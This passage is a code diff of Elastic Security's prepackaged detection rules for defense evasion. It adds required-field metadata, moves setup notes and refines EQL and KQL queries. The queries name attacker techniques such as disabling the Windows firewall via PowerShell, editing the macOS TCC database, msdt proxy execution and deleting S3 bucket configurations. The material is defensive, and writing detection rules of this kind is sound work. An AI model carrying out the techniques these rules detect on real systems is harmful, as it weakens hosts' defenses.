"keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "ccc55af4-9882-4c67-87b4-449a7ae8079c", "severity": "high", @@ -44,5 +91,5 @@ } ], "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_powershell_windows_firewall_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_powershell_windows_firewall_disabled.json index f9cf7a5e568c2..73438ef48f16d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_powershell_windows_firewall_disabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_powershell_windows_firewall_disabled.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Windows Firewall Disabled via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Windows Firewall Disabled via PowerShell\n\nWindows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a\ndevice and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `Set-NetFirewallProfile`\nPowerShell cmdlet.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing\ntroubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Re-enable the firewall with its desired configurations.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Windows Firewall Disabled via PowerShell\n\nWindows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a\ndevice and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `Set-NetFirewallProfile`\nPowerShell cmdlet.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing\ntroubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Re-enable the firewall with its desired configurations.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.action == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or process.pe.original_file_name == \"PowerShell.EXE\") and\n process.args : \"*Set-NetFirewallProfile*\" and\n (process.args : \"*-Enabled*\" and process.args : \"*False*\") and\n (process.args : \"*-All*\" or process.args : (\"*Public*\", \"*Domain*\", \"*Private*\"))\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", @@ -23,8 +23,31 @@ "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", "http://woshub.com/manage-windows-firewall-powershell/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -59,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privacy_controls_tcc_database_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privacy_controls_tcc_database_modification.json index 7109a68b805ae..cd1ae060d17c9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privacy_controls_tcc_database_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privacy_controls_tcc_database_modification.json @@ -11,15 +11,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privacy Control Bypass via TCCDB Modification", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"sqlite*\" and \n process.args : \"/*/Application Support/com.apple.TCC/TCC.db\"\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"sqlite*\" and\n process.args : \"/*/Application Support/com.apple.TCC/TCC.db\" and\n not process.parent.executable : \"/Library/Bitdefender/AVP/product/bin/*\"\n", "references": [ "https://applehelpwriter.com/2016/08/29/discovering-how-dropbox-hacks-your-mac/", "https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh", "https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "eea82229-b002-470e-a9e1-00be38b14d32", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -54,5 +77,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.json index 1cc9aa9f1004a..758f460b5f5a0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.json @@ -11,13 +11,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privacy Control Bypass via Localhost Secure Copy", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and \n process.name:\"scp\" and\n process.args:\"StrictHostKeyChecking=no\" and \n process.command_line:(\"scp *localhost:/*\", \"scp *127.0.0.1:/*\") and\n not process.args:\"vagrant@*127.0.0.1*\"\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.name:\"scp\" and\n process.args:\"StrictHostKeyChecking=no\" and\n process.command_line:(\"scp *localhost:/*\", \"scp *127.0.0.1:/*\") and\n not process.args:\"vagrant@*127.0.0.1*\"\n", "references": [ "https://www.trendmicro.com/en_us/research/20/h/xcsset-mac-malware--infects-xcode-projects--uses-0-days.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c02c8b9f-5e1d-463c-a1b0-04edcdfe1a3d", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -61,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_process_termination_followed_by_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_process_termination_followed_by_deletion.json index 85316f7836b89..288bc6bfbdd03 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_process_termination_followed_by_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_process_termination_followed_by_deletion.json @@ -10,7 +10,39 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Termination followed by Deletion", - "query": "sequence by host.id with maxspan=5s\n [process where event.type == \"end\" and \n process.code_signature.trusted == false and\n not process.executable : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*.exe\", \"C:\\\\Windows\\\\WinSxS\\\\*.exe\")\n ] by process.executable\n [file where event.type == \"deletion\" and file.extension : (\"exe\", \"scr\", \"com\")] by file.path\n", + "query": "sequence by host.id with maxspan=5s\n [process where event.type == \"end\" and \n process.code_signature.trusted == false and\n not process.executable : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*.exe\", \"C:\\\\Windows\\\\WinSxS\\\\*.exe\")\n ] by process.executable\n [file where event.type == \"deletion\" and file.extension : (\"exe\", \"scr\", \"com\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\") and\n not file.path : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\")\n ] by file.path\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "09443c92-46b3-45a4-8f25-383b028b258d", "severity": "medium", @@ -46,5 +78,5 @@ } ], "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_proxy_execution_via_msdt.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_proxy_execution_via_msdt.json index b1dd677a10f95..ee56326107e69 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_proxy_execution_via_msdt.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_proxy_execution_via_msdt.json @@ -12,14 +12,47 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Microsoft Diagnostics Wizard Execution", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n (process.pe.original_file_name == \"msdt.exe\" or process.name : \"msdt.exe\") and\n (\n process.args : (\"IT_RebrowseForFile=*\", \"ms-msdt:/id\", \"ms-msdt:-id\", \"*FromBase64*\") or\n\n (process.args : \"-af\" and process.args : \"/skip\" and \n process.parent.name : (\"explorer.exe\", \"cmd.exe\", \"powershell.exe\", \"cscript.exe\", \"wscript.exe\", \"mshta.exe\", \"rundll32.exe\", \"regsvr32.exe\") and\n process.args : (\"?:\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml\", \"PCWDiagnostic.xml\", \"?:\\\\Users\\\\Public\\\\*\", \"?:\\\\Windows\\\\Temp\\\\*\")) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.name : \"msdt.exe\" and process.name != null) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.executable : (\"?:\\\\Windows\\\\system32\\\\msdt.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msdt.exe\"))\n )\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n (process.pe.original_file_name == \"msdt.exe\" or process.name : \"msdt.exe\") and\n (\n process.args : (\"IT_RebrowseForFile=*\", \"ms-msdt:/id\", \"ms-msdt:-id\", \"*FromBase64*\") or\n\n (process.args : \"-af\" and process.args : \"/skip\" and\n process.parent.name : (\"explorer.exe\", \"cmd.exe\", \"powershell.exe\", \"cscript.exe\", \"wscript.exe\", \"mshta.exe\", \"rundll32.exe\", \"regsvr32.exe\") and\n process.args : (\"?:\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml\", \"PCWDiagnostic.xml\", \"?:\\\\Users\\\\Public\\\\*\", \"?:\\\\Windows\\\\Temp\\\\*\")) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.name : \"msdt.exe\" and process.name != null) or\n\n (process.pe.original_file_name == \"msdt.exe\" and not process.executable : (\"?:\\\\Windows\\\\system32\\\\msdt.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msdt.exe\"))\n )\n", "references": [ "https://twitter.com/nao_sec/status/1530196847679401984", "https://lolbas-project.github.io/lolbas/Binaries/Msdt/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "2c3c29a4-f170-42f8-a3d8-2ceebc18eb6a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -39,12 +72,12 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/" } ] } ], "type": "eql", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_rundll32_no_arguments.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_rundll32_no_arguments.json index 1be910d1f0203..1e135540d3e51 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_rundll32_no_arguments.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_rundll32_no_arguments.json @@ -14,6 +14,43 @@ "license": "Elastic License v2", "name": "Unusual Child Processes of RunDLL32", "query": "sequence with maxspan=1h\n [process where event.type in (\"start\", \"process_started\") and\n (process.name : \"rundll32.exe\" or process.pe.original_file_name == \"RUNDLL32.EXE\") and\n process.args_count == 1\n ] by process.entity_id\n [process where event.type in (\"start\", \"process_started\") and process.parent.name : \"rundll32.exe\"\n ] by process.parent.entity_id\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "f036953a-4615-4707-a1ca-dc53bf69dcd5", "severity": "high", @@ -35,7 +72,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -49,5 +86,5 @@ } ], "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_s3_bucket_configuration_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_s3_bucket_configuration_deletion.json index febf708cc12d5..8221e1a74dc92 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_s3_bucket_configuration_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_s3_bucket_configuration_deletion.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS S3 Bucket Configuration Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:s3.amazonaws.com and\n event.action:(DeleteBucketPolicy or DeleteBucketReplication or DeleteBucketCors or\n DeleteBucketEncryption or DeleteBucketLifecycle)\n and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketPolicy.html", @@ -24,8 +24,38 @@ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketEncryption.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucketLifecycle.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "227dc608-e558-43d9-b521-150772250bae", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -54,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_safari_config_change.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_safari_config_change.json index a56b2cf6e6ded..b883cfedb114b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_safari_config_change.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_safari_config_change.json @@ -15,6 +15,28 @@ "references": [ "https://objectivebythesea.com/v2/talks/OBTS_v2_Zohar.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6482255d-f468-45ea-a5b3-d3a7de1331ae", "severity": "medium", @@ -51,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sandboxed_office_app_suspicious_zip_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sandboxed_office_app_suspicious_zip_file.json index 385f89910ab7d..81a74797c9128 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sandboxed_office_app_suspicious_zip_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sandboxed_office_app_suspicious_zip_file.json @@ -11,12 +11,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Microsoft Office Sandbox Evasion", - "query": "event.category:file and not event.type:deletion and file.name:~$*.zip\n", + "query": "event.category:file and not event.type:deletion and file.name:~$*.zip and host.os.type:macos\n", "references": [ "https://i.blackhat.com/USA-20/Wednesday/us-20-Wardle-Office-Drama-On-macOS.pdf", "https://www.mdsec.co.uk/2018/08/escaping-the-sandbox-microsoft-office-on-macos/", "https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "d22a85c6-d2ad-4cc4-bf7b-54787473669a", "severity": "high", @@ -27,7 +49,24 @@ "Threat Detection", "Defense Evasion" ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1497", + "name": "Virtualization/Sandbox Evasion", + "reference": "https://attack.mitre.org/techniques/T1497/" + } + ] + } + ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_scheduledjobs_at_protocol_enabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_scheduledjobs_at_protocol_enabled.json index 0d24d9b347d93..ea6524fc37c8a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_scheduledjobs_at_protocol_enabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_scheduledjobs_at_protocol_enabled.json @@ -12,13 +12,26 @@ "language": "eql", "license": "Elastic License v2", "name": "Scheduled Tasks AT Command Enabled", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where \n registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\Configuration\\\\EnableAt\" and \n registry.data.strings : (\"1\", \"0x00000001\")\n", + "note": "", + "query": "registry where\n registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\Configuration\\\\EnableAt\" and\n registry.data.strings : (\"1\", \"0x00000001\")\n", "references": [ "https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-scheduledjob" ], + "required_fields": [ + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "9aa0e1f6-52ce-42e1-abb3-09657cee2698", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sdelete_like_filename_rename.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sdelete_like_filename_rename.json index 510b588f33ef8..28bd1643da5bc 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sdelete_like_filename_rename.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sdelete_like_filename_rename.json @@ -12,10 +12,23 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Secure File Deletion via SDelete Utility", - "note": "## Triage and analysis\n\nVerify process details such as command line and hash to confirm this activity legitimacy.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\nVerify process details such as command line and hash to confirm this activity legitimacy.", "query": "file where event.type == \"change\" and file.name : \"*AAA.AAA\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "5aee924b-6ceb-4633-980e-1bde8cdb40c5", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +63,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sip_provider_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sip_provider_mod.json index 9092870cdffa1..6bfa82ad68f0d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sip_provider_mod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_sip_provider_mod.json @@ -14,6 +14,23 @@ "references": [ "https://github.com/mattifestation/PoCSubjectInterfacePackage" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f2c7b914-eda3-40c2-96ac-d23ef91776ca", "severity": "medium", @@ -50,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.json index 68e279eca8bcb..f8fcb273d58fe 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.json @@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "SolarWinds Process Disabling Services via Registry", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where registry.path : 